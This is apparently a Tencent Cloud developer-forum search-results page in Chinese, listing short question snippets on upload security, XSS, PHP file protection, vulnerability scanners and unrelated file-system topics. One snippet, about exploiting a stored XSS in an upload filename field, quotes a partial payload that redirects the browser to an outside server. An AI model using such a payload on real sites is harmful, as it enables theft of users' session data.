腾讯云
开发者社区
文档
建议反馈
控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
登录/注册
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
Nginx - Wordpress只上传图像规则
uploads
我是否可以在nginx config中添加一条规则,允许用户只上传带有".jpg“扩展名的图片? 我知道黑客可能会在映像中执行php代码,但至少这是一个很好的安全措施。
浏览 0
提问于2016-09-16
得票数 0
2
回答
上传安全保护-我需要在一个777
文件
夹上的额外保护吗?
php
、
security
、
file-permissions
我刚开始通过php上传
文件
。这很好,而且我只保留了一些不敏感的信息,它的图像基本上是向公众显示的。但是,如果有人知道我的服务器
文件
夹的图像名,或者只有当php
文件
在我的服务器上时,他们才能运行delete语句呢?即删除myimage.png 基本上,我的问题不是一般的安全预防措施,比如限制只上传.png、使用basename等等,我是否需要采取额外的安全措施来防止有人删除该
文件
夹中的
文件
,或者只能从我的ca
浏览 5
提问于2013-11-26
得票数 0
回答已采纳
1
回答
如何修复片段注入
漏洞
android
、
android-fragments
、
fragment
、
preferenceactivity
实际上这不是我的问题,但我只是把这个分享给信息
读
我自己的答案
浏览 0
提问于2016-12-31
得票数 0
回答已采纳
2
回答
访问DCIM
文件
夹的iOS4
xcode
、
permissions
、
ios4
我想要
读
/写DCIM
文件
夹。/var/mobile/Media/DCIM 我没有JailBreak4.0计算机,所以我找不到DCIM
文件
夹的真实位置。苹果是否关闭了能够从任何应用程序写入该位置的
漏洞
,还是将其移动到了另一个位置?
浏览 0
提问于2010-07-03
得票数 3
回答已采纳
1
回答
为什么“图像
文件
上的MIME类型不匹配”是一个安全
漏洞
?
xss
、
web-scanners
一些安全
漏洞
扫描器( Ratproxy )检测到名为“图像
文件
上的MIME类型不匹配”的
漏洞
。多亏了CAPEC项目,我们可以看到使用MIME类型不匹配的跨站点
脚本
编写是可能的,但我并不清楚所显示的解释。我发现的是,在存在此
漏洞
的地方,可以将Javascript嵌入到PNG
文件
中,上传到站点,并以某种方式在PNG
文件
中执行Javascript。 ,您能用一个例子来解释攻击者如何利用这种
漏洞
吗?是否需要web客户端(例如浏览器)也有一个
漏洞</em
浏览 0
提问于2013-06-28
得票数 2
回答已采纳
3
回答
不使用/利用
文件
名中的XSS
web-application
、
xss
、
file-upload
我试图利用
文件
上传的
文件
名字段中的
漏洞
进行攻击。web应用程序无法正确验证上传
文件
的
文件
名,因此存在存储的跨站点
脚本
漏洞
。我的问题是,每当我试图重命名
文件
以包含类似于下面的有效负载时,我就不能在
文件
名中包括/。 document.location='http://my_test_server.com/bla.php?甚至有可能利用这个
漏洞
吗?
浏览 0
提问于2018-04-19
得票数 2
回答已采纳
5
回答
用php编辑
文件
的所有方法?(安全)
php
、
security
、
upload
、
edit
、
exploit
我的网站有一些严重的安全
漏洞
。在保护the服务器之后,我现在将保护我的php
文件
。 因此,我想知道由于我的php
脚本
中的
漏洞
,所有的方法都可能被用来上传或编辑php
文件
。
浏览 1
提问于2011-03-13
得票数 1
回答已采纳
1
回答
在linux中可以创建一个固定大小的
文件
吗?
c
、
linux
、
file-io
我需要一个功能,将创建一个固定大小的
文件
在linux。像truncate或fopen,fseek,fclose这样的函数不是一个解决方案,因为它们会用零填充打开的
文件
,但这不是必需的,我没有时间讨论这个问题。那么有没有什么函数可以只打开固定长度的
文件
,而不填充缓冲区呢? 提前谢谢。
浏览 4
提问于2011-08-23
得票数 1
回答已采纳
2
回答
我是否应该在htmlspecialchars中使用ENT_QUOTES?
php
、
xss
、
sanitization
我使用php5.4.4作为UTF-8运行,我不确定我是否正确地使用了htmlspecialchars。$text = "<p><span class='clx'>By:</span> ".htmlspecialchars($foo)."</span></p>";我是否需要使用ENT_QUOTES,还是只有在必须回显某些内容时才需要使用
浏览 1
提问于2014-01-16
得票数 5
回答已采纳
1
回答
ZFOD的范围是什么?
filesystems
、
ext4
这意味着
文件
系统不会将写数据分配给
文件
,但它只会给我们ZFOD的范围,当应用程序试图读取/写入数据时,它只会填充数据零点,然后执行
读
/写[来源]。我以上的理解正确吗?如果它只是不分配数据,这是否意味着它是一个
漏洞
?
浏览 0
提问于2018-04-11
得票数 0
回答已采纳
2
回答
使用PHP保护SQL数据库凭据的最佳实践
php
、
sql
、
wordpress
我目前在我的PHP
文件
中使用这个片段来连接和拉取数据: "DRIVER={SQL Server Native Client 10.0};Server=Connection to DB via ODBC failed: "; echo "</p>\n";有没有人看到了这个
漏洞
浏览 0
提问于2015-02-27
得票数 0
3
回答
Windows 2012中wp内容
文件
夹的权限
updates
、
directory
、
permissions
、
windows
我做了一些测试来解决这个问题:试图通过Wordpress后端更新一些插件,我总是收到一个“无法创建
文件
夹”错误。因此,我最初添加了具有
读
/写/修改权限(不是完全控制)的IIS_IUSRS,但是没有任何改变。但是,您认为将此权限授予每个用户是一个安全
漏洞
吗?你觉得什么能解决问题?
浏览 0
提问于2015-04-13
得票数 5
2
回答
漏洞
扫描与模糊web应用程序
vulnerability-scanners
、
web-scanners
、
fuzzing
在web应用程序的上下文中,
漏洞
扫描是否是一种形式的模糊?Wikipedia将模糊定义为“向计算机程序的输入提供无效、意外或随机的数据”。Web应用程序
漏洞
扫描器发送无效的意外数据,以识别SQL注入或跨站点
脚本
等
漏洞
。
浏览 0
提问于2016-05-29
得票数 1
回答已采纳
2
回答
Web应用程序
漏洞
扫描-假阳性-识别和消除
web-application
、
vulnerability-scanners
Web应用程序
漏洞
和潜在的假阳性 作为渗透测试器,应用程序
漏洞
扫描是任何渗透测试方法的重要组成部分。在应用程序扫描阶段,可能会出现几种不同类型的
漏洞
。主要是..。SQL注入/盲目SQL注入、跨站点
脚本
/持久性跨站点
脚本
、命令注入、XPath注入、SOAP/AJAX攻击、CSRF/HTTP响应拆分、任意
文件
上传攻击、远程
文件
包括(PHP代码注入)、应用程序errors根据我的经验,SQL注入
漏洞
将隐藏最错误的结果。
浏览 0
提问于2014-10-15
得票数 1
1
回答
<script>标记不在php回送语句中呈现。
javascript
、
php
></form></html> XSS拒绝执行“”中的
脚本
,因为它的源代码在请求中找到。
浏览 5
提问于2015-08-13
得票数 0
回答已采纳
1
回答
如何准确地从c++程序复制linux上的
文件
?
c
、
linux
、
file
、
copy
确切地说,我的意思是在稀疏
文件
和所有扩展属性中保留
漏洞
,捕捉目标
文件
系统不支持或不完全支持的情况(例如,不同的EA长度)?在安装的NTFS
文件
系统上,它也应该使用备用流。保存尽可能多的
文件
属性。我看了GLIB,他们用打开/
读
/写/关闭序列的最简单的方式来做。
浏览 1
提问于2012-07-17
得票数 1
2
回答
如何在
脚本
所在的目录中找到Perl模块
perl
、
module
、
cgi
来自@INC,我对模块
文件
位置的最佳实践很好奇。到目前为止,与我们网站上的每个应用程序相关联的*.pm
文件
与
脚本
位于相同的目录中。我猜,这会产生一个安全
漏洞
。我们可以将pm
文件
留在原来的位置,并将use lib ".";添加到所有现有
脚本
中,但这样做不是只会保留安全
漏洞
吗? 对于如何根据这一新开发最好地组织我们的Perl
脚本
及其相关模块,有什么建议吗?
浏览 0
提问于2017-05-02
得票数 3
1
回答
在收到新电子邮件时在outllook上运行规则
vba
、
outlook
我已经创建了一个规则,将移动电子邮件到确定的
文件
夹,然后运行一个
脚本
,检查未
读
的电子邮件,标记为已
读
,并将解密的电子邮件输入数据库。我遇到的问题是,如果指定
文件
夹中的所有邮件都已读取,则电子邮件将移动到规则中的指定
文件
夹,但
脚本
不会在新电子邮件上运行。但是,如果我在指定的
文件
夹中有一个未
读
的邮件,只要有新的电子邮件进入,它就会将前一封电子邮件标记为已
读
,
脚本
会运行,但不会在新的电子邮件上运行,它仍然
浏览 16
提问于2017-03-13
得票数 0
回答已采纳
1
回答
查找稀疏
文件
与常规
文件
进行比较,结果会出现意想不到的结果?
c
、
unix
使用
文件
和创建一个洞应该使用较少的磁盘空间,因为这个洞没有记录在磁盘上,而且这个洞被填充为零。我可能从根本上完全忽略了“寻找”的用法要点?如果是的话,请随意投票,因为我知道只有最高质量的职位是被允许的。解释我在这里错过了什么?a b c d e f g h i j A B C D E
浏览 2
提问于2017-07-10
得票数 1
1
回答
应对库
漏洞
和风险
javascript
、
reactjs
、
web-applications
、
react-redux
你好,我最近安装了redux,下载后在我的控制台上看到存在低
漏洞
和高
漏洞
。这是什么意思?我应该卸载它吗?
浏览 3
提问于2020-09-24
得票数 0
回答已采纳
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
用python读Excel文件
文件上传漏洞
A20:文件的读与写
批处理动态生成脚本或文件
浅谈文件包含漏洞
热门
标签
更多标签
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
活动推荐
运营活动
广告
关闭
领券